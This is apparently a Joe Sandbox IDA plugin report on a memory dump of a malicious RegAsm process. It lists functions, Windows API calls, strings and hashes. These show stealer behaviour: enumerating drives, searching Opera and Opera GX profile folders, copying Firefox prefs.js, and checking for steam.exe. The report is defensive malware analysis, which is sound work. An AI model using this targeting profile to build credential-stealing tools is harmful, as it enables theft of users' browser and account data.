Part of subcall function 00414C20: wsprintfA.USER32 ref: 00414C74
Part of subcall function 00414C20: FindFirstFileA.KERNEL32(?,?), ref: 00414C8B
Part of subcall function 00414C20: _memset.LIBCMT ref: 00414CA7
Part of subcall function 00414C20: _memset.LIBCMT ref: 00414CB8
Part of subcall function 00414C20: StrCmpCA.SHLWAPI(?,004369EC), ref: 00414CD9
Part of subcall function 00414C20: StrCmpCA.SHLWAPI(?,004369F0), ref: 00414CF3
Part of subcall function 00414C20: wsprintfA.USER32 ref: 00414D1A
Part of subcall function 00414C20: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414D2E
Part of subcall function 00414C20: wsprintfA.USER32 ref: 00414D57
Part of subcall function 00414C20: _memset.LIBCMT ref: 00414D80
Part of subcall function 00414C20: lstrcatA.KERNEL32(?,?), ref: 00414D95

lstrcpyA.KERNEL32(?,00000000), ref: 004151A2
lstrlenA.KERNEL32(?), ref: 0041521C

Strings

*%DRIVE_REMOVABLE%*, xrefs: 004150E7
%DRIVE_REMOVABLE%, xrefs: 0041516D
&SA, xrefs: 004152B8
&SA, xrefs: 004150AD
*%DRIVE_FIXED%*, xrefs: 004150B6
%DRIVE_FIXED%, xrefs: 00415188

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$&SA$&SA$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-939011140
Opcode ID: aa496c01569aa74ab9939facc747b182a803de1379f9e41a71f4a6523ca7bc07
Instruction ID: 9aa3cf52fd38a2e375bc7508bfd96ce299f34719a5711a881f33bf2667ead802
Opcode Fuzzy Hash: aa496c01569aa74ab9939facc747b182a803de1379f9e41a71f4a6523ca7bc07
Instruction Fuzzy Hash: 36514BB1900218AFDF319FA4DC85BDA7BB9FB09304F1041AAEA08A6111EB355E84CF59

Function 00415395 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004153C2
FindFirstFileA.KERNEL32(?,?), ref: 004153D9
StrCmpCA.SHLWAPI(?,00436A74), ref: 004153FA
StrCmpCA.SHLWAPI(?,00436A78), ref: 00415414
lstrcatA.KERNEL32(?), ref: 00415465
lstrcatA.KERNEL32(?), ref: 00415478
lstrcatA.KERNEL32(?,?), ref: 0041548C
lstrcatA.KERNEL32(?,?), ref: 0041549F
lstrcatA.KERNEL32(?,00436A7C), ref: 004154B1
lstrcatA.KERNEL32(?,?), ref: 004154C5

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416DF0: CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
Part of subcall function 00416DF0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

FindNextFileA.KERNEL32(?,?), ref: 0041557B
FindClose.KERNEL32(?), ref: 0041558F

Strings

%s\%s, xrefs: 004153B6

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 98e72338c419b2fa3eea6302874b19dd9e2b210e0ca4a0457d6468c4f945ee57
Instruction ID: 972475d8df958d3014d12121b6fa49fef1f222f171cbb9ef8590380756e74793
Opcode Fuzzy Hash: 98e72338c419b2fa3eea6302874b19dd9e2b210e0ca4a0457d6468c4f945ee57
Instruction Fuzzy Hash: 4C5141B190021D9BCF60DF64DC89AC9B7BDAF49305F0045E6E609E3250EB359B85CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682A,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437464), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437468), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,0043683F,0043683E,0043683B,0043683A,00436837,00436836,0043682B), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

Opera Crypto, xrefs: 0040C09F
Opera, xrefs: 0040C083
\*.*, xrefs: 0040BF73
Opera GX, xrefs: 0040C091

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: 5b8997fac8ec0da9c3ede48954688ac13124a786ac0be4a5e183fdcfef5309dc
Instruction ID: 12922f673615b2dfaeaeae8f5ad6ee29cc4747a78ae4f05cf6a983958e3d6b98
Opcode Fuzzy Hash: 5b8997fac8ec0da9c3ede48954688ac13124a786ac0be4a5e183fdcfef5309dc
Instruction Fuzzy Hash: 33021D71A401299BCF21FB26DD466CD7771AF14308F4151EAB948B3192DBB86EC98FC8

Function 00401D80 Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043A9A0,0043A9A4,004369FB,004369FA,axA,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043A9A8), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043A9AC), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043A9B0,0043A9B4,?,0043A9B8,00436A05), ref: 004020DD

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00416DF0: CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
Part of subcall function 00416DF0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416DF0: Sleep.KERNEL32(000003E8,?,?), ref: 00416E57

Strings

\*.*, xrefs: 00401E9E
axA, xrefs: 00401D95

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*$axA
API String ID: 1116797323-986257239
Opcode ID: 863e7d094681ec6c2a8a566b01039a8967e185c1ec96140e02863e0d72f3888c
Instruction ID: 1a65d57001782b4de9cf245e24a29764d5005f909820f01c8719e16703c29371
Opcode Fuzzy Hash: 863e7d094681ec6c2a8a566b01039a8967e185c1ec96140e02863e0d72f3888c
Instruction Fuzzy Hash: 2F32EC71A401299BCF21FB25DD4A7CDB375AF04308F5100EAA548B71A1DBB86FC98F99

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437564,004368A7,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437568), ref: 0040D668
StrCmpCA.SHLWAPI(?,0043756C), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,00437570,?,004368B7), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001,00437580,004368BA), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: ece295e2ea67f6699b2b532d6ec0e2f5fc47c1ecdf1869524ee149516e47e3e7
Instruction ID: dc5dbf96fdfdde440d769ebbdab08e2572e2506d016a28158cd9f852e571f521
Opcode Fuzzy Hash: ece295e2ea67f6699b2b532d6ec0e2f5fc47c1ecdf1869524ee149516e47e3e7
Instruction Fuzzy Hash: 19A11E72D002289BDB60FB65DD46BCD7375AF44319F4101EAB808B7291DB78AEC98F85

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437418,0043681E,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,0043741C), ref: 0040B678
StrCmpCA.SHLWAPI(?,00437420), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437424,?,0043681F), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373C4,0043680E,?,?,?), ref: 0040AC8A

FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: ff6e6588d13a8e64b0d9fefb6a5dfd5f7b4a666e22e918e27d5205c211820677
Instruction ID: 9bb36cd2a08d778bf6673bba7b542c8932310c3b8efae095972da7c3599b819d
Opcode Fuzzy Hash: ff6e6588d13a8e64b0d9fefb6a5dfd5f7b4a666e22e918e27d5205c211820677
Instruction Fuzzy Hash: BE813D7290021C9BCB20FB75DD46AD97779AB04308F4541B6FC08B3291EB789E998FD9

Function 00410DDB Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,00436707,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73
|hC, xrefs: 00410F05

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: / $|hC
API String ID: 507856799-1436559069
Opcode ID: 34313ffc019f2fcb44770abad6050ea206ae0eaa491f1e8e7158779dc1499280
Instruction ID: d83570d9534c2537dc4f82d309fa6699b27b746fed58856c19d4cf27c7185c0a
Opcode Fuzzy Hash: 34313ffc019f2fcb44770abad6050ea206ae0eaa491f1e8e7158779dc1499280
Instruction Fuzzy Hash: 9F312F71900228AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A7152CBB86EC5CF54

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 2fc0d330449f3b8321b1ccbb4811ee37acce275e9c0630592987fe45ff40ef26
Instruction ID: e1d54f83aef08206d7b43f9893a82822ba7ea1233e91713923a59287d1f46282
Opcode Fuzzy Hash: 2fc0d330449f3b8321b1ccbb4811ee37acce275e9c0630592987fe45ff40ef26
Instruction Fuzzy Hash: D901E171A012249BDB70DF649D85BDE77B9AF08711F5441A6A409E22D0DB788A818B15

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417D8A,.exe,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4,00436CA0,00436C9C,00436C98), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
